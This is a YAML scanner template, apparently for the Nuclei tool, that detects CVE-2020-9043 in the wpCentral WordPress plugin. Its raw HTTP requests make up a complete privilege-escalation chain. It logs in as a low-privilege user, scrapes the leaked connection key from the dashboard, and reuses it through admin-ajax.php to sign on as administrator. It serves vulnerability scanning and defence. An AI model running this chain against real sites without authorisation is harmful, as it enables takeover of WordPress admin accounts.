id: CVE-2020-9043 info: name: WordPress wpCentral < 1.5.1 - Improper Access Control to Privilege Escalation author: scent2d severity: high description: | The wpCentral plugin before 1.5.1 for WordPress allows disclosure of the connection key for Wordpress Admin Account. reference: - https://wpscan.com/vulnerability/10074 - https://www.wordfence.com/blog/2020/02/vulnerability-in-wpcentral-plugin-leads-to-privilege-escalation/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9043 - https://wordpress.org/plugins/wp-central/#developers classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2020-9043 cwe-id: CWE-200 metadata: verified: "true" tags: wordpress,wp-plugin,wpcentral,authenticated,wp,wpscan,cve,cve2020 requests: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | GET /wp-admin/index.php HTTP/1.1 Host: {{Hostname}} - | GET /wp-login.php?action=logout&_wpnonce={{nonce}} HTTP/1.1 Host: {{Hostname}} - | GET /wp-admin/admin-ajax.php?action=my_wpc_signon&auth_key={{authkey}} HTTP/1.1 Host: {{Hostname}} redirects: true max-redirects: 2 cookie-reuse: true req-condition: true matchers: - type: dsl dsl: - "contains(all_headers_4, 'text/html')" - "status_code_4 == 200" - "contains(body_4, 'wpCentral Connection Key')" - contains(body_4, "pagenow = \'dashboard\'") condition: and extractors: - type: regex name: authkey part: body group: 1 regex: - 'style="word-wrap:break-word;">([a-z0-9]+)' internal: true - type: regex name: nonce part: body group: 1 regex: - '_wpnonce=([0-9a-z]+)' internal: true